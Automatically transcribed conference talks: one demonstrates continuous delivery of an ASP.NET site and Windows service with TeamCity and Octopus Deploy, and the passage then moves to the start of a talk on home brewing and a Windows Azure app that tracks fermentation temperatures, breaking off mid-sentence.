testing. You have the capacity stage where you do stress testing and load balancing. It's very important that the capacity stage equals the production stage or the hardware and setup. So it gives you good representation. And then finally, you have the production. This is not what I'm proposing that you should go implement tomorrow. But I use this as a goal when I'm trying to build my deployment pipeline. In the same way that you have on the left, you have Uncle Bob's vision of how your test coverage should be. You can see that you should have 100% unit test coverage, 50% component tests. This, I would also say this, don't go try to implement this at once unless you have a green field project and can start from scratch. If you can reach the one to your right, you should be happy. You should not stop there, but you should at least have that as a first goal. Another thing in continuous deployment is where it is, blue-green deployment. It starts with one version of your system in release. Then you deploy a second version while the first one is still there. And after running smoke tests on all of the servers that you have deployed to, then you just flip a switch and reroute all the users to the new version. This is very good because if something should go wrong, you can just flip the switch back and you don't have any downtime or any significant downtime in your production environment. So Facebook goes a little bit further. They have this big clusters of servers and millions of users. You can imagine what would happen if they made a critical bug into production. Then their reputation would just fall apart. They first release the new versions to an internal part of the servers where only their employees get to test the feature. When they are satisfied with the quality level there, then they deploy it to a small subset of the features. When they are satisfied with that, they deploy it to everybody. Using this way, they can also test the different versions of implementing a new feature and see which one gets the best response and go for that. So the argument for using continuous delivery because you will need some arguments to be able to spend your developing time doing something else than developing. You have the quality argument. In the same way that unit tests increase the potential quality of your software, automating your builds will give you a repeatable reliable way of deploying. So you can remove the manual step, get fewer errors and that gives you higher quality software. You will save money by catching bugs early if you have automated acceptance tests. You will save money because it would take a shorter time to fix them. If you can pick the bug up and the automated acceptance test stage, then if you have to wait a week for the testers to be able to test it. And you have the time aspect. Once you have automated your deployment, it will be automatic. You can just push a button and the time you spent before, you can use doing other stuff. A small example of this, in the background you can see the whiteboard of our key office. They decided to implement this team city octopus deploy solution. Before they started, they had approximately 30 minutes to deploy time. After, they had four minutes. Now they deploy four times a day and they spent initially eight hours of implementing the process. And if you do the math, you have a small equation there which says that if you do this on Friday or during the weekend, then a little bit after lunch on Friday, you will have saved all the time you spent on it originally. And then you will save approximately half an hour each time you click the button. And if you add this, put some numbers on this, multiply it with hours, number of releases you have, maybe the hourly price of a consultant, then you would probably have a strong argument for your superiors for implementing this. So that was the short introduction part. The next part I'm going to use trying on another equation, trying to prove another equation. And we are loading the next slide. Oh. Don't get any internet here. That's sad. Is there any reason for there not being any internet connection on the NDC network? Is there any other network I can use? Okay, we'll try the cable. Now I have a question. Let's see. If I can use the cable. Let's see if we can get this slide up and running. Do I have to reload the entire page? No. Oh, there we are back. I think. I'm sorry for this. I did have the entire slide preloaded before my blue screen, right before the start here. Oh, and there we are back on. Nice. Just took some time. We were at number 15 there. Yeah, the question that I'm going to spend the rest of time on is this one. I'm trying to prove that using TeamCity and OctopusDeploy is a ton of fun. At least I think so. So we're going to start with showing how to deploy a website. We start from scratch and we start in Visual Studio. We create a basic ASP.net website. The only thing I'm going to change is a part of the index page where you can see I have a reference to environment and version. Environments just read an app setting variable from the config file. A version reads the website DLL assembly version. I also have added a couple of additional transform files. You can see this will be the names of the deployment environments. That will make them automatically be transformed when deploying to that environment later. So when we have done that, we will need to create an Octopus package. Octopus negative package. You can see also this is the transform I have for the config transform I have. It only does it finds the environment setting in the app settings and changes it according to the development, to the environment. Just to show that the transforms are working. So we start off by creating the Octopus nugget package. If you wonder why they chose the nugget format, since that is basically a format for our dependencies while library dependencies on their website, they say it's because they have rich metadata. They have lots of available tools for creating them, for managing them and stuff. It's feed-based so you can easily write your own feed. You can easily consume the feed. Developers know how to use them because we use them all the time when developing our own software. It's already used for other purposes. Like chocolatey which is the coolest thing you can come for an apt-get or aptitude for Windows. It's a single command line based installing of packages and software. Another thing you need to be aware of when creating these packages is that it does not follow default nugget conventions. They have some default folder structure and stuff like that. Octopus deploys the package as s. So if you have a website, you just pack that directory and you're good to go. Then you need to add a new spec file. This is being used by nugget to add additional information to your package. The important stuff here is mostly the ID. The version will be overwritten. The title and description are just for description of the package. And the other stuff are just ignored mainly. So you have three ways of creating this package. By far the easiest way is to open the package manager console, type in install package, up the pack. Which is a tool that downloads a target file. It modifies your csprog file to reference this. And it also has executable for creating the package. Then you can just add a parameter in your MS build as run octa pack. And then it will create the package for you. The second way is using team city. They have a nugget pack runner. Which you will then specify your build number, your directory and your output directory. And you can also then select publish created packages to artifacts. In team city. We'll come back to that later. And we will have... This is a snippet from a script you'll see later from a partial script. You can just use the nugget executable directly. And then you specify the file name content there in the version. So there, that's the three ways. Now we're actually finished in visual studio. If you have done that, you're finished and can go over to configuring team city. We were this web project, we will have two build configurations. The first one will be the commit build. We will set this up. We will only change the build number format. I've changed it to a format that I like. This squiggly thing at the end means that the zero will be replaced by this on each, the counter on each build. Then I add a VCS route. I'm connecting to GitHub and this link is live. So we go to GitHub gate pod. Then you can see the source code I've been using for this project. And then in the build steps page, I add a build feature and choose assembly info patcher. What this does by default is running through all your assembly info files before build, replacing the version number with the build number you have. You can also change it, exchange it with other stuff if you'd like that. But the default action is to replace it with the build number. Then you add two build steps. We have the first compile step. It's a visual studio runner type. Select the solution and you have the target rebuild configuration release. That's okay. Then at the bottom I have an extra section because I installed the team city octopus deploy plugin. Then I can just instead of adding the run octopac parameter for MS build, I can just check this box and say that, okay, I want the system build number to be used for the package version as well. Going further, you have the commit tests. It's an unit test runner running all the test DLLs in the release folder excluding the ones in the object folder since they don't have any references and I don't want to run tests twice. Of course, I want to build the trigger on each check-in, so I add an ECS trigger for that. Then we can run the build and it will produce a build artifact. It will produce a NVIDIA package which you can open because it's basically a zip file. You see the project structure. They have a couple of files you don't need to worry about because you will not see them after deployment like the roles and the package and the content types there. Now we are actually complete, but we want to publish this package to a Nugget server. Thankfully, team city has that as well. So you just go into settings and you click the Nugget settings and you click enable Nugget server and then you will get an authenticated feed URL which you will use. If you want to use one of the Nugget tools or team city build tasks, you will need to go to the Nugget command line and download Nugget as well. Download the version or upload it. When we have done that, we go over to octopus deploy because now we need to set up our project. First, we create some environments. As you can see here, you have three environments. We have the development environment located on the build server and we have a separate test and production environments. The way you configure this is install a small service called a tentacle on each of these servers. During the installation process, they will give you this thumb print which you will have to enter in this box when you add a machine to an environment. You give it a name and URL and you say give it a role. We only have one role. We only have one machine. It's a website. I don't have any database servers and I don't have any external other servers. You will also need the thumb print located in the octopus deploy configuration to put in the tentacle config as well to authenticate both ways. Then I do this for the other two servers as well. We can start creating our project. We can just create a new project group and we go to configuration and add a new repository. You can see this is the field, this URL you saw in team city before. I used the username and password that I created for the team city which was in this case build and build. Now I create my project group and project. When I have done that, I go in to create and adding these steps. I'm not going through the first step now because this is just a partial script roughly copied from the octopus deploy documentation page. If you click on partial scripts there, I believe that's where you can find the script. I just changed a couple of few names. This script will be available for you afterwards and in the end I will give you a peek at it. I will go through the published website. You will see here that you choose a new repository and a package. You will get auto completion when you type that. You select which role you want to deploy it to. Then you have some XML configuration. You have two main options. One option is to automatically run configuration transformation files. If you deploy to development environment, then if you have web.development.config, that transformation will be run. And no so on for test release. You can add some additional transforms if you want. If you have some octopus variables with the same name as any app settings, you can also check this box to make them or write it so you don't need the config transforms. And since this is an IAS website, I will say, I will try to automatically update the IAS website with this name, which is a variable that I have set. The smoke test is another just short PowerShell script. It gets the PowerShell variables host name and port and it does a web request to that URL to check that website is up and running. Very basic. And then I have a manual step. We can see that this step is only for the test environment. So in the other environments, this will not be run. You have some instructions. Go to this location and verify only behavior. That's just a very simple description. And it's only users in the testers group that are allowed to do this, perform this step. Developers are not allowed to say that, verify this deployment in the UAT environment. The variables I have are the host name as you see. These are connected to a specific machine, which makes sense. You have the IAS bindings, which uses the port and the host name. This is the way you refer to Octopus deploy variables within Octopus deploy. It's the hash sign and the variable name within brackets. I have an empty variable name here and I have the Octopus website name, which says that you are going to install this website in development as NDC 2013 demo development and the test in test and so on. You have the port 8080 for development, since I have a lot of other service running there. For test and production, that port is 80. But you can see that I can't see. I cannot see and I cannot edit this variable because this is a production variable. This screenshot is taken when I'm logged in as a developer. And I've explicitly set the rights that you're not allowed to see or edit production variables. So that's one way you can get your IT ops department to allow the production configuration, the rest of the production configuration to stay in the source control. And then they and only they can have power over those variables. The permissions are set as following. First you allow the roles that you want and then you tie down. So administrators are allowed to deploy to all environments, developers and testers only to their respective environment and deny everything else. And you can see that Octopus administrators are allowed to view and edit production variables, but no one else is. And then the last step before you go to the user, you want Team City to work as when you start deployments from Team City and you need this API key. Then you can go back to Team City and create the integration build. The integration build is pretty similar, but you can see that the build number format is entirely taken from another variable. The depth means it is dependency. The BT2 is Team City static name for a specific build. You will get, after adding dependency, you will get auto completion when typing in these variable names. So you don't need to guess which name Team City gives the build. And you add a dependency by, I added a snapshot dependency here for retrieving that build number. Then you add Octopus deploy release. This is also a build step that comes with the Octopus deploy team city plugin. You specify the URL of the server, the API key I just mentioned. You name the project, you say the release number you want to have. And if you want to deploy to one or more environments. Since I'm going to have another step running some so called automated integration tests after this, I'm going to wait for the deployment to complete before continuing to the next build step. Which is a PowerShell step. I've added the text that was in this text box in a little more readable way. It is the same stuff that we did in the smoke test. But you have to call it a little bit different. You have to use a web session when calling it from Team City. And that's actually all you need for deploying the website. Let's see if we don't have the connection to Team City here. So I'll try connecting to and to see here again to see if we can get it running. So let's just, we can try to open the build server. All this is set up on three virtual machines running a free version of Windows 7. If anybody wants these machines, and build environment, you can get a copy from me. It's about 17 gigabytes. I have it on this, right? Oh, yeah. And I use the standard password, which is password one. Okay. While waiting to demonstrate that, we can go on with how to deploy a service. The way I choose to select my service is to have another website, asp.net web API self-hosted as a Windows service. I'm not going to go too much into detail how to do that. We're just going to start from, okay, we have a service. We have the application config. We have two other variables, the host name and port. These will be overwritten by the octopus deploy variables later. Since this is not a website, octopus deploy does not know how to install it itself. But if we have a script named deploy.ts1, it will run that when it comes to that part of the deployment process. I have made a partial script library, which is being used by deploy. There. The HTTP API service contains all the magic for self-hosting web API. And I have the same configuration transforms as I had in the last project. I have a new spec file with another different ID. The program which bootstraps the project installer, which is the only important thing is that I need to have the service name the same as the actual service, provided service name here. And I gave the display name the name I want to have in Windows services list. And the rest of the process is almost exactly the same. So I'm not going to go through all the steps once more. I'm just going to go through the differences. So everything I'm not showing in this part of the process is exactly the same as when deploying the website. I have removed one step, the prepare step. And I have the publish service step instead. The thing I've done there is I just unchecked this and removed the text from here because it's not an IAS server. I also have another set of variables and the host name and the port. And now I'm logged in as administrator so we can see the actual port in production. And these variables will be replacing the ones in the app config. And differences in the automated acceptance test here. This URL will return adjacent object containing the environment and the version just like the other website. And I then save the web response in this variable and I check if it contains the correct environment and the connect version. You can see to get a team city variable inside a PowerShell script you use this format and you replace the dots with underscores. So let's see if we got this server up and running. Did we? No, not yet. I can see if we can. It does seem like it. Then we will go on to the next two following scripts uses this configuration file. The structure I've created just for my own purposes. It's about creating packages and publishing them with PowerShell. First file here you can see it takes a couple of parameters, the content directory and the version. You create a new XML object and load the configuration file into that and have a variable containing all the entire configuration structure. I assemble the new spec file name from the config name and I create the entire path which I send to the NuGet pack. You might recognize this from earlier in the presentation. And I catch errors and I have an exit code one to notify the build or release process that this blew up. To publish a NuGet file it's almost the same. You load the configuration now you create the NuGet file name string instead of the new spec. And then I add a NuGet source to the server I want to add. Then I publish that package to that source and I remove that source again because I don't want that source which is my get to end up in whistle studio when I'm trying to get packages and stuff. And I catch an exit one if anything wrong. If you need to create or combine using Team City or now Octopus deploy and MS deploy say that your production environment has a rule that it only accepts MS deploy packages. Then you are able to in your build process create an MS deploy package as well as the Octopus package and you can deploy the package that you would like. So we can still compile once and compile the website or structure and package this into different packages. Then you just have to build up the parameter string which uses a sync content path and package and they use their own config transformations. That's important to know because the MS deploy will not run your regular config transforms. Then you have the deploy PowerShell script that you saw before. That PowerShell script it just sets a service name and service executable. It doesn't infer this because it might be a DLL. In this case it's not. I've created a method install web API service which looks a little bit like this. It tries to get the service. It checks if the service exists in advance. If the service does not exist then it will get the.NET framework directory. It will create the install utl path or command to execute and it will install it. If the service exists it will stop the service and reconfigure the binary path using the sse tool instead. When that's completed you get the port and since this is a web service, no a windows service which want to accept the web requests. This is done automatically by IAS of course but since I don't have the app pool writes and stuff I have to set the url ACL myself. That's what the set user writes. I give the nt authority network service the right to accept all the requests on this given port. The get framework directory is a really simple one. It's just a one liner. It's very nice to have because it will always get the current.NET framework directory. Then you use the url format that the url ACL needs. Then you try to get the current url ACLs. If it exists then you don't have to add the permissions. If it doesn't exist then you will use the net command and add the url ACL for the user to the url. This deploy, oh then you also have the get port. It uses another way of reading the XML file. It finds all the add elements in the app settings and enumerates it through them. It tries to find the one named port and sets the port if it's not found. It just returns the default port. This deploy util ps1 also, I don't have to show that now, but it also contains methods for undoing all these steps for removing the security rights for uninstalling the service. All of the scripts shown or being referenced will be available in another. I will add them to another get repository on my GitHub. Both of the website and the web service are available at GitHub. As I said, if you want to try to test this environment for yourself, you can do that. You can get all of the three virtual machines and go through the things yourself. Let's try to see if it does disconnect the internet now. No, still no connection to the internet. There. Okay. I will try to, look, I can finish the presentation before trying to demonstrate the build and deployment process. So how to get started doing this? Usually, you cannot just implement this. If you are in a green field project or don't have complex deployment routine, then you probably can just go on and put everything and automate everything at once. Most often, that's not the case and you will have to do this manually. The way, or partially manually, step by step, the way you do this is that you first create the environments and projects that you will need. And add all the automated build steps that you can do, like maybe copying files from one server to another. You also have some different deploy steps. That makes this a little bit easier. You can send emails. You can have the manual intervention required. This will be, you will add one of these for all the different manual tasks. So even by creating a deployment process with only manual tasks, you will have a reliable, repeatable deployment process, even though it's not automated. One of the biggest issues, the sources of error in the deployment process is when you do it manually and for God's Step, or do it in one order. So, note that if you don't have access to your deployment or one of the environments, you can run more than one tentacle on the server, just not as a service. You will have to start them manually. But then you can simulate having a production environment and put all the manual steps there. So when you're deploying, you can tick off or click proceed for each step that you want. And you also have ways to connect the issue tracker. In Team City, you have, in the settings in Team City, you have the issue tracker. You can connect things like JIRA, bug track, and one more, I think, very easy. Then you can also integrate the other ways. So you can get Team City built in the status in, for instance, JIRA. So you say here, see here. If you want to connect your issue tracker and it sees that you have an issue key in your checking comments, it will automatically associate it and add it to the build notes. And that was the presentation part of the process. And now let's see if we are lucky with trying to get the deployment or the machines working here. Does anybody have any questions, meanwhile? So we'll try to add a new network bridge with the cable. As I said, there were a lot of slides here and they're all available at slideshare. I will add a Google plus post with the links to the slides, the links to the two repositories, and the links to the scripts that I've told you. And I will also create, if you are not able to copy the entire set of virtual machines after the talk now, I will add torrent for it as well and host it for at least a week or two. So you can download and you can test everything you have seen here in the talk for yourself. Let's see if we are able to go there. So are we having, we're not having any problems here. And we probably need to enable and disable. That's the downside of having to rely on an internet connection for your demo. We see, oh, it's a home network. There's only nice people here. Now can we get somewhere? Yeah. So now this machine is up running. That means we should be able to load the team city build server. And this problem should go away. So, try the Octopus server. Here you can see the slides. Oh, and there we are up and running. Nice. So, that means we can start. It seems like Octopus deploy didn't like very much to be killed like that. So if we just go a little bit down. Oh, yeah, we have to go to the here and we do serve. Open the services and restart. And restart the Octopus service. The Octopus service and oh, it's not even started. It stopped when it started. Try again. Yeah, there we have it. And now we can actually run the deployment part. So, we will log in as a developer first. And here you can see my project. It's the IIS one I'm going to use now. Just have to see that this is disabled. I will have. The one thing about Octopus deploy is that it's free to use for one project. So if you're going to demonstrate two projects, you will have to disable the one you're not showing at the moment. So, and I will go and disable the service here. Now everything should be okay for starting a deployment. So we take the web and we pretend that we have done a change to the source code. And we start the build as we can go and see the build is running. It usually doesn't take that much because I didn't want to add a lot of the code quality stuff. TeamCity has a lot of code quality steps that you can include very, very easily. If you go to build steps and you choose to add a build step, you have things like FX cop. You have inspections and you have duplicates finder, for instance, which are very easy to just add to your project to get some more quality assurance. If we go back to these projects now, we'll probably be, oh, it's running now. Almost complete with the build process. And then when this ticks off, the integration build will start. The integration build will then create a new release here. You can see that the test environment, we, oh, we're not running the test environment. The build environment is up and running. You can see that we are running 10.025. You can also, oh, you don't need the service. So here you see it starting to create the octopus release. If we go for releases now or for an overview, we should see that the development environment will start giving notice that it's being deployed. And it's about halfway through. So. Oh, there we have it. You see that 10.126 has been started deploying. And it was a success. All the steps were finished. If you would like to take a look at it, then you can see all the outputs. You see the XML transforms are being done. You see that it transforms from the properties. And you get the entire content back. Now we would like to promote this to the test environment. That's cool. But I'm logged in as developer, so I'm not allowed to do that. So I can log out and log back in as a tester. Now we will have to have the test machine up and running as well. If I remember correctly, it wasn't up and running a second ago. So we will. Oh, yeah. Because it restarted. And I'm using, I'm not using server OSS on these machines. I'm using the free Windows 7 image you can download yourself to meant for testing older versions of Internet Explorer. So it has, I've activated it. It has a 90-day license. So it's free to use and not giving away illegal software. Yeah, so we go for the test. Okay. Does it have Internet connectivity? Or do we have to play with the, yeah, we think we have to play with the network settings here as well. We can do this for production at the same time though. We log in. The password for all of these are password 1 to log in with a big P. It also will come up as password hint if you type the wrong. Now we should be up and running, I think. So, oh, yeah. We have a home network. We got to choose this. And we cancel this. So now we will get connected. Oh, yeah. And there our test environment should be up and running. And we should see that, oh, that was a build. And this is the test. This is the API. Oh, it's running. When we get this up and running, we can start the push over. So if you go into the project here, we can see the different versions in different environments. You can see a project activity here, which is queued deployment, which requested deployment. You can also have the, take a look at all the steps, the variables. When you set up, for instance, the manual step, as you saw, you don't have very little to actually, well, enter. You only have the approval group and the environment. Oh, there we are up and running. Now we can go to this deployment and we can promote this to the test environment. The only environment we're allowed to deploy. And I deploy this. You can see the current version is 25. And I'll just fix the network thing on the production server meanwhile. Oh, it seems like this is up and running already. Kid it? So now it publishes the website. And when it has done that, it stops. It runs the smoke test. Oh, it's not completely up yet. And soon it's our turn. There. Now the build is in the manual step mode. If you go back and take a look, you see that this build is paused. It will not get further. I chose this as the way to mark user acceptance test failures or successes. So if you do not approve this, you will get a failed build, a failed deployment. What you will do is go to this URL and verify all new behavior. That means that this version number should change. And it did. So we can proceed. Oh, that was the one. It doesn't like the host network changing that much. And we cancel. And we can't do it. And there we should be able to go see if we can get the current version up and running first. So now we have the 26 version deployed to development and test. It will be the same. Oh, here we also have it in release in production, as you can see. And now we can promote this release again. We can promote it to, well, we have to log in as an administrator to be able to purchase the production. The password is simple. It's equal for every all of the octopus users. It's password one, the same as you log into the computer with. Now you can go here and promote this to, now we have all environments. You say production. And we want to deploy that release. And it will do the same thing again. The same process. But now again, excluding the step number four, the manual improvement. Maybe you should want to add the manual improvement of that step as well. Or maybe you want to add a mail, the next step, which sends out a mail to a mailbox or a common user address. And for doing the entire, the same thing for the Windows service is the same. You can also go, if we go to one of the machines, we can say that the service services. And we can open the IIS manager. So you can see how they are installed in this machine. We can also take a look at how octopus uses their packages. You have the octopus folder here. And then application subfolder. This is the environment test. So it has one test environment. And this is the first name of the website. And you have one folder for each of the projects. And you have one folder for each of the releases that has been released there. You can set different retention policies to keep all versions forever. You can set it to keep just the last five versions or the last week's versions or something like that. So we have always can go back a week, but not farther than that. And to just switch from one of these to the other, you just make a redeployment of that to current release. And since it detects that we are already installed, then we just make the switch. And that's how you actually do rollback. And here you can say it has all the configurations, but the web config has been transformed. And if you go to here, you will have the application pools. You have the MDC demo test app pool, which I created with a script. And it would have used the fault app, web application, the fault app pool if I didn't have this partial script in advance. And you have the demo test website. In the services, you have this service with the service name I, and the description that I chose, you can see that it's currently 25. That's the deployed. And you see the service name HTTP API service. And now we should have deployed this all the way to production. I can disable this. And if you would like to watch, we can do the same thing with the service. But this will be the last thing that I'll do. So we will start the service built. Now we can also go into the integration process and see the web and see the results of the integration or this automated acceptance test. This step is a little bit faster because I removed the unit tests step here. So if we go for the integration build here, and it should have started build, there we have one, we can go to the build log. And we can tail it. Now we can see it's finding the project, it's handshaking with the server, creating the release, and now deploying it. So the release 26 has already started. And you can see, oh, it's already deployed. So this one should have environment development and the version 26. If we go to the test and the production. Now I'm logged in as administrators and I'm automatically allowed to deploy this. But then again, now you can see, oh, it's in the correct environment development. This is the small so called automated acceptance test I wrote in PowerShell and it has the correct build number. So my integration build is okay. Let me see if we could have the test. And that will be interesting. We will release this to test. And the deploy to test, it also has the manual stage. It also has the same deploy to the production as you've seen before. But now there's nothing, the rest of the process, nothing new, it's actually the same. So that concludes the talk. And thank you for coming.
|
Many of us have one or more manual steps in our deploy and release processes. This leads to a lot of time spent waiting for the right people to do the job. Also, errors often occur due to steps forgotten or done incorrectly. This often leads to high walls between the testers, IT-ops and the developers. This talk will start out with some general continuous delivery, the why's, where you'll get to know the actual benefits of applying continuous delivery and the arguments you need to be allowed to spend time on it. Then we will move over to the how's. By demonstrating how you can use TeamCity and OctopusDeploy to configure automated builds and one-click deployment of both an asp.net website and a windows service, and how you can migrate your current manual process into an automated one. Along the way, we will be discussing how OctopusDeploy chooses solves specific problems, and other ways you might handle those issues.
|
10.5446/51469 (DOI)
|
Alright. Good afternoon everyone. Welcome to day one of NDC, an awesome conference I think. I spoke here two years ago and it's like the only conference I really recommend people go into so I'm really happy to be speaking here again. Maybe a bit of a strange topic for a technical conference. I'm going to talk about brewing beer with Windows Azure, which is kind of fun because brewing beer is fun, drinking beer is fun, Windows Azure is quite fun so I think it's a perfect match to speak about. So anyone is using Windows Azure at the moment? Okay, cool. Couple. Anyone is brewing beer at the moment? Well, not at the moment, but at home. But nice. A lot of people. So please don't judge me on my, I'm like a new home brewer. I've been doing this for one year right now so I still make mistakes and so on. So don't shoot me if I tell anything wrong about brewing beer there. Also don't shoot me if I tell anything wrong about Windows Azure. But anyway, this talk is basically a collection of several little talks. So I'm going to first talk about brewing beer, how you do this, what it's all about, what you have to do. You will see that you will be cleaning quite a lot during the process of brewing beer. And at some stage I think that was when, well, there's actually two stories that may be there. But I think I came up with a session title for this one while being slightly drunk, which is one of the stories. And I went home and it is like awesome title, brewing beer with Windows Azure. Yes, but what am I going to talk about? So I came up with this concept of having several smaller talks, some on brewing beer, some on what is Windows Azure. A little bit about web APIs, a little bit about how you can secure them. So I think there's quite a lot of topics that you will see throughout this talk. So who am I? I'm Martha Mayo. I'm a technical evangelist with JetBrains, hence this nice orange t-shirt. I run the user group in Belgium for Windows Azure, the Windows Azure user group, ASUG. Historically and even still, my focus has been everything web related. So Windows Azure, ASP.NET MVC, web API, signal and so on. I'm also an MVP in Windows Azure. I blog about all those topics. You can find me on Twitter there as well. And just if you want to buy me a beer, you can either buy me a beer after the session, or you can just buy the book, which buys me a beer in turn, or at least half a beer. Because book writing is not that lucrative, to be honest. But anyway, setting expectations. What this talk is not going to be about, or what this talk is not going to be, not something like this. We're also not going to do something like this, which would be interesting, but still, we still want this building to remain. Also, this is not what we're going to do. Maybe for those who are joining us at the boat cruise this afternoon or this evening, that might be the end result of the boat cruise, but that's not what we're going to do during this session. What are we going to do? Well, brewing beer. I have several minutes about just brewing beer, so you will learn nothing about ASP.NET, nothing about Windows Azure there, but you will go home thinking, yes, I want to brew my own beer. Then we'll have a look at what brew buddies, something I came up with for sake of this talk. Windows Azure websites, Windows Azure service bus, Windows Azure access control, basically a lot of technologies during the talk. And also, we need an API and maybe some questions and answers afterwards. So brewing beer. How do you start brewing beer? Well, how did I get started? Who convinced me into brewing beer? Well, that was this guy. I don't know if you know him, but he's been one of the former hosts of the Cloud Cover Show, which is an online show on Channel 9 where you can basically learn a lot about Windows Azure. This is Wade Wagner. And one of the nice things about being an MVP is that you get to go to the MVP summit every year. So you fly out to Seattle, you have a couple of beers, you see what's coming in all the products and so on. And at the MVP summit in 2011, I was talking with Wade Wagner and he was a home brewer. And I was like, yeah, yeah, yeah, whatever. An American brewing beer that cannot be good, right? So last year at the MVP summit, I went there again and Wade started talking about that again and I was tasting some of the American beers and I was like, if that's what they do in the US, I might as well just start brewing myself because it can get worse, right? So I started brewing my beer there. So how do you brew beer? Well, first of all, you have to buy some stuff to start working with. So what I did was I went Googling and I found this nice local company in Belgium who had a starter kit, which you can find throughout the internet. You can buy this stuff in the UK. You can buy it in Norway probably as well. You just go there, you buy a starter kit with some kettles, with some of the things like for measuring alcohol levels and so on. You just buy that. That's more than enough to start with and you will see along the way if you start liking it, you will go beyond this kit. But it's a great way to start brewing. Now, the process of brewing is quite simple. You have to get your kettles clean. So the last thing you want to have is any bacteria or something like that in your beer because fermentation may fail. There may be bad bacteria in there starting to multiply and you get a very bad taste in the beer, which is probably how the Dutch guys brew their beer. But anyway, next thing you do is add and boil your ingredients. So you have to add malt, you have to add hops, you have to add whatever you want to pour in there. You can add herbs as well. There's a couple of ways you can start brewing. One of the ways is you buy this massive tin can containing a liquid-ish goo, which is basically something like syrup. You pour it into a kettle, you add boiling water and that's the brewing. Which is interesting to start with but it's just basically opening a can and pouring it in your kettle, which is not that fun to do. So a second way of brewing beer is using malt extracts, which are those bags you see on the picture. You buy those bags, you put those in the kettle, you start boiling them and you go on. Then the real way of brewing beer is just buying the grains, making sure you mash them, making sure you extract the sugars from those and boil those in your kettle. Now I am currently at the malt stage because my wife doesn't really like me bringing in too much of those big brown sacks of grain into the kitchen. Next, after brewing this or after cooking all this, you have to put it in the brewing kettle and you get something like this. It looks, the color is beer-ish but it's not really beer. Actually if you taste it, it's just like very, very sweet water. You would think, hmm, not that interesting. By the way, during the cooking, that's also not the most interesting time to be around your kettle because it smells a little bit. So you do this, you put all that in a kettle, you add yeast, which can be liquid yeast, which can be something you, basically if you drink a beer, there's always some yeast residual in there. You can start multiplying that as well and add that to your beer. You can add dry yeast, you can add liquid yeast and so on. So you add it in there and then you get to rinse all your material while the beer is fermenting. Brewing is cleaning. So this is something you will do a lot. Actually, brewing 25 liters takes about three hours, three hours and a half. Half an hour of that time is actual brewing. Those other three hours are just cleaning your stuff. So if you think brewing beer is romantic, something you want to really do because of the fun of that, don't go there. It's a lot of cleaning, seriously. Then after cleaning and after you put aside your beer, well, at least what's becoming your beer, you have to wait for the fermentation to complete. So basically what's happening is you have this very sweet sort of water. By adding the yeast, the yeast will eat all the sugars in there. It will convert all those sugars into alcohol and a little bit of smell again. And you have to wait for fermentation to complete. Typically, it takes about a week. It may take a little bit longer, maybe a bit shorter. But typically about a week before your beer actually contains alcohol and starts tasting a little bit like beer. Then the thing I typically do is you don't have to do it. At this stage, you can actually put it on the bottle and put it aside and have it age a little bit to have a nicer taste. But what I typically do because I don't have stuff to filter my beer, I typically put it aside for another week in another kettle so the liquid can become a little bit clearer. Also, this is the residual in your first kettle you have put aside after the fermentation. So you see you don't really want this stuff in your bottles because otherwise you will drink this afterwards. So I typically put it all at a site and of course again you have to clean and wait another week before you can actually do something else with your beer. But after a week, after that you can start bottling. So you just fill up your bottles and you think, yes, I have my own beer. Like this. The difficult part at that stage is you have to wait for the beer to age. About six weeks at least before the taste actually starts being good and before carbonation will occur. So if you put the beer in the bottle, there's still some sugars in there, there's still some yeast in there and you want the gas of the yeast which it generates to become CO2, basically to become the bubbles in your beer. So you have to wait a couple of weeks before that happens or a couple of days before that happens or otherwise you have this stale, non-phomy, non-sparkling beer basically. So those six weeks are the hardest process of the entire brewing thingy. It takes a while, six weeks is long and typically there's always some bottles which don't survive that long because you want to taste the end result, you want to make sure that you actually brewed something which may be nice to consume afterwards. So those six weeks are really difficult. But after six weeks you can go into this. Now a good question may be what does this all have to do with Windows Azure? Well to be honest not a lot but I thought it may be interesting to combine brewing beer with Windows Azure. So that was what I did. And I came up with this brilliant idea of building a website called brewbody.net which is like the GitHub for developers but then the brew hub for beer drinkers or beer brewers. So social brewing. See what this website does is and I can actually show you in my browser. It's this one. Let's just sign out. So you go to the website, you see it's social brewing blah blah blah. You can find some public recipes for beer on there. You can see there's some there, there's some test recipes as well. I have my IPA which I brewed last week on there as well. You can see the details, I can see all the ingredients, I can see all the steps I have to do to brew this thing. Next thing I can do is create an account on this website. So I can create an account and log in and I can manage my own recipes. So I have a couple in there. I can edit my recipe, I can add markdown syntax in there and so on. And I can also choose if I want to publish this recipe in the public gallery or not. So if I don't want to share my recipe with anyone that's perfectly fine for this website. You just put it on there and we don't show it to anyone. If you make it public, people will see it in the public recipe gallery. Next thing you have is your brews. So you can have one recipe but maybe you want to brew this a couple of times. So here you see I brewed this RushFar which is by the way a nice Belgian beer. I've brewed it quite a couple of times and I can see the details of my brew. So you can see this is actually a brew for a specific recipe. You can see all the ingredients and so on. And you can also see what happens during the brew. This one doesn't have a lot of information. But if we look at this one for example, you will see that we get a temperature profile there which is not the ideal temperature profile for fermentation of your typical beer but it's just a demo profile which is in there. But the idea is that during the fermentation you actually have to have quite a stable temperature. So for the yeast to do its work it has to have a very stable temperature. It's even more difficult to brew things like pills for example. You have to have a very low temperature there so you actually have to cool your liquids which is kind of difficult to do. And what this thing does is it allows you to manage your recipes, it allows you to manage your brews and it allows you to keep track of the fermentation temperature while your beer is fermenting. Which is a nice thing because you can just put it at home. You can just have the fermentation going on and then you can use this website from your work location for example to monitor what's going on. And if you see there's a sudden spike in there, you may want to drive home. Don't think your boss will like it but anyway. So you get those things, you get the public recipes, you can manage your own brews, you can copy brews and so on and link your own temperature sensor to those things. Which is interesting because it's kind of difficult to do all that. The website is kind of simple having a database is kind of simple but combining all those components you actually need a couple of things. So on Windows Azure I have a public website running on Windows Azure website so that's the thing I just showed you. You can use the website there, you can log in there, you can make use of the website, add your recipes, add your brews, etc. Under need that I have a SQL database. So I'm using SQL Azure or Windows Azure SQL database depending how you want to call this nowadays. Just storing all the recipes, storing all the user data, storing all the brews, storing all the statistics on the fermentation temperature. Next thing you have is some sort of a sensor and in my case I just wrote a simple WinForms application which connects to a USB sensor and then pulls in the temperature. Now you have to get that sensor data into your database somehow. How would you do this? Well I chose to use the service bus, Windows Azure service bus to gather all that data, basically queue up all that data, crunch the data and then put it in the database. So the data crunching is done by a Windows Azure worker role. So I have a sensor posting to a service bus topic, service bus is consumed by a worker role, worker role is putting that data in my database which I can then consume through the website. Now why this worker role? Why am I not just using the sensor data and putting it into my database? Well I want to have some quality control there. If for some reason a temperature sensor goes wild and goes like 50 degrees and beyond, probably the sensor is broken or your 